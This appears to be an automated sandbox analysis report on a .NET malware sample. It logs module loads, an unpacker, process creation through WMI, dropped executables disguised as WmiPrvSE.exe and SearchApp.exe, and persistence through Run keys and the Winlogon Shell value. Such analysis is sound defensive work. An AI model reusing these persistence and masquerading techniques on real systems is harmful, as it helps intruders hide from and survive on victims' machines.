Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: secur32.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: schannel.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mskeyprotect.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ntasn1.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ncrypt.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ncryptsslp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: msasn1.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: gpapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windowscodecs.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: apphelp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: version.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: wldp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: profapi.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: version.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: wldp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: profapi.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: sspicli.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: apphelp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: version.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: wldp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: profapi.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: sspicli.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: version.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: wldp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: profapi.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SearchApp.exe	Section loaded: sspicli.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\WmiPrvSE.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kQyd2z80gD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kQyd2z80gD.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: kQyd2z80gD.exe, 78v.cs	.Net Code: _9jF
Source: kQyd2z80gD.exe, Ba5.cs	.Net Code: _1G1 System.AppDomain.Load(byte[])
Source: kQyd2z80gD.exe, Ba5.cs	.Net Code: _1G1 System.Reflection.Assembly.Load(byte[])
Source: kQyd2z80gD.exe, Ba5.cs	.Net Code: _1G1

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Code function: 0_2_00007FF848F21ADC push es; retn 7002h	0_2_00007FF848F21BB9
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Code function: 0_2_00007FF848F100BD pushad ; iretd	0_2_00007FF848F100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848E1D2A5 pushad ; iretd	17_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848F300BD pushad ; iretd	17_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF849002316 push 8B485F92h; iretd	17_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848DFD2A5 pushad ; iretd	18_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848F100BD pushad ; iretd	18_2_00007FF848F100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF848FE2316 push 8B485F94h; iretd	18_2_00007FF848FE231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FF848E0D2A5 pushad ; iretd	20_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FF848F200BD pushad ; iretd	20_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FF848FF2316 push 8B485F93h; iretd	20_2_00007FF848FF231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF848E1D2A5 pushad ; iretd	22_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF848F300BD pushad ; iretd	22_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF849002316 push 8B485F92h; iretd	22_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848DFD2A5 pushad ; iretd	24_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848F1B9FA push E85925D7h; ret	24_2_00007FF848F1BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848F1BA7A push E85925D7h; ret	24_2_00007FF848F1BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848F100BD pushad ; iretd	24_2_00007FF848F100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848FE2316 push 8B485F94h; iretd	24_2_00007FF848FE231B
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F31ADC push es; retn 7002h	29_2_00007FF848F31BB9
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F37269 pushad ; iretd	29_2_00007FF848F3726D
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F200BD pushad ; iretd	29_2_00007FF848F200C1
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 30_2_00007FF848F300BD pushad ; iretd	30_2_00007FF848F300C1
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 31_2_00007FF848F400BD pushad ; iretd	31_2_00007FF848F400C1
Source: C:\Recovery\SearchApp.exe	Code function: 32_2_00007FF848F200BD pushad ; iretd	32_2_00007FF848F200C1
Source: C:\Recovery\SearchApp.exe	Code function: 33_2_00007FF848F300BD pushad ; iretd	33_2_00007FF848F300C1
Source: C:\Recovery\WmiPrvSE.exe	Code function: 34_2_00007FF848F300BD pushad ; iretd	34_2_00007FF848F300C1
Source: C:\Recovery\WmiPrvSE.exe	Code function: 35_2_00007FF848F200BD pushad ; iretd	35_2_00007FF848F200C1
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 38_2_00007FF848F100BD pushad ; iretd	38_2_00007FF848F100C1
Source: C:\Recovery\WmiPrvSE.exe	Code function: 39_2_00007FF848F400BD pushad ; iretd	39_2_00007FF848F400C1
Source: C:\Recovery\SearchApp.exe	Code function: 40_2_00007FF848F000BD pushad ; iretd	40_2_00007FF848F000C1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	File created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	File created: C:\Recovery\WmiPrvSE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	File created: C:\Recovery\SearchApp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	File created: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Jump to dropped file

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

File created: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchApp	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

File created: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe

Jump to dropped file

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dLErkomWRcaRguaKAMtYMnt	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchApp	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchApp	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchApp	Jump to behavior
